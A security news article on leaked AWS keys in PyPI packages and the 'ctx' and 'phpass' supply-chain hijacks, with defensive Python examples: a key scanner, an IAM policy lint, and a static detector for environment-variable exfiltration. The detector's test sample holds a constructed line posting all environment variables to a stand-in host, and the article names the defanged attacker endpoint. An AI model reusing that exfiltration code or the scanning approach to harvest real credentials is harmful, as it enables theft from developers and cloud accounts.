
PyPI Hosting Malware and AWS Keys


The Python package repository PyPI was found to be hosting malware and leaked AWS keys. Tom Forbes, a software developer, wrote a Rust-based tool that scans every new PyPI package for AWS API keys. It turned up 57 valid keys, including ones belonging to Louisiana University, Stanford, Portland, Amazon and Intel.

Forbes explains that the scanner runs on a schedule under GitHub Actions and checks fresh releases on PyPI, HexPM and RubyGems for AWS keys. When it finds any, it generates a report with the relevant details and commits it to the AWS-cred-scanner repository.

According to Forbes' article, "The report comprises the keys that have been found, as well as public links to the keys and additional metadata regarding the release." Because the report lands in a public GitHub repository, GitHub's Secret Scanning service kicks in and notifies AWS that the keys have been exposed.
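To make the scanning step concrete, here is an added example in Python. It is not Forbes's tool (which is written in Rust and not reproduced here): it unpacks a source distribution held in memory, looks for access key IDs and nearby secret keys, and decodes the owning account ID from each key ID, a documented property of AWS key IDs that the post itself does not cover. The package, file names and file contents are constructed; the two key IDs are public documentation examples, not live credentials.

```python
import base64
import io
import re
import tarfile

# An AWS access key ID is a 4-character prefix (AKIA for long-lived user keys,
# ASIA for temporary STS keys) followed by 16 base32 characters (A-Z, 2-7).
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z2-7]{16}(?![A-Z0-9])")
# A secret access key is 40 characters from the base64 alphabet.  Alone that
# pattern is far too noisy (any 40-hex git commit hash matches), so hex-only
# candidates are dropped and a secret is only reported alongside a key ID.
SECRET_KEY_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+]{40}(?![A-Za-z0-9/+=])")
HEX40_RE = re.compile(r"[0-9a-fA-F]{40}")


def account_id_from_key_id(key_id):
    """Recover the 12-digit AWS account ID embedded in an access key ID.

    The 16 characters after the prefix are base32; the account ID is held in
    the first 6 decoded bytes with the top bit masked off and the value shifted
    right by 7.  This is a documented property of current key IDs and lets a
    report name the owning account without ever using the credential.
    """
    raw = base64.b32decode(key_id[4:])
    value = int.from_bytes(raw[:6], "big")
    return (value & 0x7FFFFFFFFF80) >> 7


def scan_sdist(blob):
    """Scan an in-memory .tar.gz source distribution and return key findings."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode("utf-8", errors="replace")
            secrets = [s for s in SECRET_KEY_RE.findall(text) if not HEX40_RE.fullmatch(s)]
            for lineno, line in enumerate(text.splitlines(), 1):
                for key_id in ACCESS_KEY_RE.findall(line):
                    findings.append({
                        "file": member.name,
                        "line": lineno,
                        "key_id": key_id,
                        "account_id": f"{account_id_from_key_id(key_id):012d}",
                        "secret_present": bool(secrets),
                    })
    return findings


def build_sample_sdist():
    """Constructed stand-in for a freshly uploaded sdist; not a real package."""
    files = {
        "demo_pkg-1.0.0/setup.py":
            "from setuptools import setup\nsetup(name='demo_pkg', version='1.0.0')\n",
        # The AWS documentation's example credential pair, not live keys.
        "demo_pkg-1.0.0/demo_pkg/config.py":
            'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'
            'AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"\n',
        # A 40-hex commit hash (must not be mistaken for a secret) and a
        # temporary key ID that is widely used as a public worked example.
        "demo_pkg-1.0.0/NOTES.txt":
            "built from commit 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12\n"
            "session key seen in CI log: ASIAY34FZKBOKMUTVV7A\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_sdist(build_sample_sdist()):
        print(hit)
```

Reporting the account ID rather than only the key string is what makes a public report actionable: the key's owner can be identified from the ID alone, and nothing in the scanner ever calls AWS with the credential. The hex exclusion is the one filter a real scanner cannot skip, since every git commit hash in a changelog would otherwise be flagged as a secret.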

According to Forbes, "It relies on the specific rights granted to the key itself. Other keys I discovered in PyPI were root keys, which are equally permitted to perform any action. The key I discovered that was leaked by InfoSys in November had full admin access, meaning it can do anything. If these keys were stolen, an attacker would have unrestricted access to the associated AWS account."

He added that other keys carried narrower but still excessive permissions. For example, he said it is common for a key intended to grant access to a single S3 bucket to have been configured, by mistake, with access to every S3 bucket in the account.
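The bucket mix-up Forbes describes usually comes down to a single Resource line. Below is an added example, not from the post: the over-broad policy beside a corrected one, and a small lint in Python that flags Allow statements granting S3 actions on a wildcard bucket. Both policy documents and the bucket name app-uploads are invented for illustration.

```python
import json

# Weak policy: the author meant "our one uploads bucket", but Resource "*"
# hands out s3:GetObject/PutObject on every bucket in the account.
OVERBROAD_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "*"}
  ]
}
""")

# Corrected policy: the bucket-level action is scoped to the bucket ARN and the
# object-level actions to objects under it.  No other bucket is reachable.
SCOPED_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": "s3:ListBucket",
     "Resource": "arn:aws:s3:::app-uploads"},
    {"Effect": "Allow",
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::app-uploads/*"}
  ]
}
""")


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _bucket_of(resource):
    """Return the bucket name from an S3 ARN ("*" for a bare wildcard),
    or None when the resource is not an S3 ARN at all."""
    if resource == "*":
        return "*"
    prefix = "arn:aws:s3:::"
    if not resource.startswith(prefix):
        return None
    return resource[len(prefix):].split("/", 1)[0]


def overbroad_s3_statements(policy):
    """Flag Allow statements whose S3 actions are not pinned to named buckets."""
    findings = []
    for index, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        touches_s3 = any(a == "*" or a.lower().startswith("s3:") for a in actions)
        if not touches_s3:
            continue
        for resource in _as_list(stmt.get("Resource", [])):
            bucket = _bucket_of(resource)
            if bucket is not None and "*" in bucket:
                findings.append({"statement": index, "resource": resource, "actions": actions})
    return findings


if __name__ == "__main__":
    print("over-broad:", overbroad_s3_statements(OVERBROAD_POLICY))
    print("scoped:", overbroad_s3_statements(SCOPED_POLICY))
```

Root user keys are outside this check entirely: IAM policies never apply to the root user, so a leaked root key has full access regardless of what is attached, which is why the root keys Forbes found are the worst case. The lint also ignores Deny, NotAction and NotResource statements, which need their own handling before it could be trusted as a gate.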

Forbes cites GitHub's automated secret scanning, which also covers keys in npm packages, as an effective tool. The expressions GitHub uses to find secrets are sensitive and not public, so PyPI and other third parties cannot reuse that infrastructure without handing all PyPI-published code to GitHub. Forbes also urged businesses to take a hard look at their security procedures.

Cybersecurity firm Phylum reported in December that it had found a remote access trojan dubbed pyrologin in a PyPI package. Last month ReversingLabs, another security company, found a malicious PyPI package posing as an SDK from SentinelOne, a third security vendor. In November, W4SP malware turned up in dozens of newly published PyPI packages. And in March 2021, PyPI removed 3,653 malicious packages in a large-scale cleanup.

When AWS is notified of an exposed key, it opens a support ticket to alert the responsible developer and attaches a quarantine policy to the key to limit the damage from misuse. The catch is that anyone can write comparable scanning software, and a malicious actor could use it to find and abuse leaked keys.


Popular Python and PHP Libraries Hijacked to Steal AWS Keys


A software supply chain attack has compromised the PyPI package 'ctx', which is downloaded over 20,000 times a week: malicious versions harvest the developer's environment variables. The threat actor even replaced older, previously safe versions of 'ctx' with code that exfiltrates the developer's environment variables to collect secrets such as AWS keys and credentials.

Versions of a 'phpass' fork published to Packagist, the PHP/Composer package repository, were modified the same way to steal secrets. Over its lifetime the PHPass framework has been downloaded more than 2.5 million times from Packagist, though the malicious versions are thought to have received far fewer downloads.

The widely used PyPI package 'ctx' was hijacked earlier this month, with newly published versions leaking environment variables to an external server. 'ctx' is a small Python library for manipulating dictionary ('dict') objects in various ways. Despite its popularity, its developer had not touched it since 2014, according to BleepingComputer. The new versions, published between May 15th and this week, contained the malicious code.

The tainted 'ctx' package was first spotted by Reddit user jimtk. Ethical hacker Somdev Sangwan also revealed that the PHP package 'phpass' had been compromised, with tainted copies of the library stealing developers' AWS secret keys. Although the malicious 'ctx' versions have since been removed from PyPI, copies obtained from Sonatype's malware archives show malicious code in every 'ctx' version that was on the index.

Notably, version 0.1.2, untouched since 2014, was replaced this week with a build carrying the malicious payload. Once installed, these versions collect all of your environment variables and upload them to the following Heroku endpoint: https://anti-theft-web.herokuapp[.]com/hacked/. At the time of analysis the endpoint was no longer active.

In a similar attack, a fork of 'hautelook/phpass', a hugely popular Composer/PHP package, was hijacked and malicious versions were published to Packagist. PHPass is an open-source password hashing framework for PHP applications. First released in 2005, it has since been downloaded more than 2.5 million times from Packagist.

This week BleepingComputer found malicious commits to the PHPass project that steal environment variables in the same way. The modified 'PasswordHash.php' file looks up AWS_ACCESS_KEY and AWS_SECRET_KEY in the environment and uploads them to the same Heroku endpoint. The matching functionality and shared Heroku endpoint in the PyPI and PHP packages suggest both hijacks were carried out by the same threat actor.
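The behaviour described for the 'ctx' and 'phpass' payloads, reading the environment and posting it to a remote endpoint, can be spotted statically before a package is installed. The example below is added here and is not the malicious code itself or anything from the projects involved: it parses a Python module with the standard library's ast module and flags any file that both reads the environment and calls a network sink. The two sample modules are constructed, and the exfiltration URL in the first is a placeholder rather than the real Heroku endpoint. The PHP variant would need the same check written against PHP source; only the Python case is shown.

```python
import ast

# Ways a module can read the environment (os.environ, os.getenv, or the bare
# names when imported with "from os import environ, getenv").
ENV_SOURCES = {"os.environ", "os.environb", "os.getenv", "environ", "getenv"}
# Calls that put bytes on the network.  Any of these next to an environment
# read inside a library module deserves a human look.
NETWORK_SINKS = {
    "requests.post", "requests.get", "requests.put", "requests.request",
    "urllib.request.urlopen", "urlopen", "urllib.request.Request",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
    "socket.socket", "socket.create_connection",
}


def dotted_name(node):
    """Render a Name/Attribute chain such as os.environ or requests.post."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def analyze_source(source, filename="<module>"):
    """Report environment reads, network sinks and whether both co-occur."""
    tree = ast.parse(source, filename=filename)
    env_reads, sinks = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in NETWORK_SINKS:
                sinks.add((node.lineno, name))
        elif isinstance(node, (ast.Attribute, ast.Name)):
            name = dotted_name(node)
            if name in ENV_SOURCES:
                env_reads.add((node.lineno, name))
    return {
        "env_reads": sorted(env_reads),
        "network_sinks": sorted(sinks),
        "suspicious": bool(env_reads) and bool(sinks),
    }


# Constructed mimic of the behaviour described above (not the real ctx code):
# a dict subclass whose constructor ships every environment variable to a
# remote server.  The URL is a placeholder, not the attacker's endpoint.
MALICIOUS_SAMPLE = '''
import os
import requests

class Ctx(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        requests.post("https://exfil.example/hacked/", json=dict(os.environ))
'''

# Constructed benign module: reads one variable, never touches the network.
BENIGN_SAMPLE = '''
import os

def get_region():
    return os.environ.get("AWS_REGION", "us-east-1")
'''


if __name__ == "__main__":
    print("malicious:", analyze_source(MALICIOUS_SAMPLE, "ctx/__init__.py"))
    print("benign:", analyze_source(BENIGN_SAMPLE, "config.py"))
```

The check is deliberately a heuristic: a library that reads a proxy setting and then makes an HTTP call will trip it too, so the output is a review queue, not a verdict. What it does catch is the shape both hijacks shared, and the same two-feature test applied to setup.py and package __init__ files is cheap enough to run on every new release.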

According to the researchers, the attacker's identity is fairly evident. However, this could have been a proof-of-concept experiment gone wrong, and it would be irresponsible to name the individual behind the 'ctx' and 'phpass' hijacks until more information emerges. While the malicious PyPI package 'ctx' stayed live until later today, the impact of the malicious 'PHPass' versions appears to have been far more limited after Packagist co-founder Jordi Boggiano marked the hijacked repository as "abandoned" and advised everyone to use bordoni/phpass instead.

The hijacking of the PyPI package 'ctx' is believed to stem from a maintainer account compromise, though the root cause has yet to be established. The hautelook/phpass hijack has been attributed to the attacker claiming a previously abandoned GitHub repository and reviving it to publish altered 'phpass' versions to the Packagist registry.

Security Innovation, a cybersecurity company, previously dubbed this type of attack "repo jacking." Intezer and Checkmarx recently published a joint study building on that research and on how it affects Go projects, which they termed "chainjacking." This hijacking follows the discovery of a PyPI typosquat that deployed backdoors on Windows, Linux and macOS.